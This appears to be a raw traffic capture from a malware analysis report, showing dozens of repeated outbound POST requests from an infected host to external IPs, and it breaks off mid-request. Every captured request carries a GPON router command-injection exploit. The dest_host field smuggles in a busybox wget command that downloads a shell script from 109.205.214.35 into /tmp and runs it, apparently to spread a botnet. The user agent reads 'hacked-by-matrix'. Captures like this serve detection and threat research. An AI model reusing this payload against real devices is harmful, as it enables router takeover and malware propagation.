                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        725192.168.2.1333942118.190.156.23443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631331921 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        726192.168.2.1347408212.2.17.79443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631362915 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        727192.168.2.1342748109.179.242.125443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631362915 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        728192.168.2.1338060118.242.117.164443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631397963 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        729192.168.2.1355828212.221.87.109443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631407976 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        730192.168.2.1352706109.232.246.147443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631408930 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        731192.168.2.1346258109.199.225.83443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631429911 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        732192.168.2.136071642.210.125.177443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631437063 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        733192.168.2.133507042.123.23.77443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631469011 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        734192.168.2.1344652212.103.26.152443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631478071 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        735192.168.2.1350258212.213.234.173443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631499052 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        736192.168.2.13561085.197.46.66443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631510019 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        737192.168.2.133807842.160.110.193443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631522894 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        738192.168.2.1359848212.239.15.58443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631550074 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        739192.168.2.1341800118.39.151.168443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631556988 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        740192.168.2.1351866118.208.200.14443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631561995 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        741192.168.2.1336868109.125.175.15443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631593943 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        742192.168.2.1344004118.84.152.0443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631593943 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        743192.168.2.1346384118.12.232.190443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631596088 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        744192.168.2.135750442.71.98.191443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631629944 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        745192.168.2.134126242.163.168.58443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631659031 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        746192.168.2.134495642.26.55.174443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631663084 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        747192.168.2.13431545.213.0.58443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:53.631664038 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
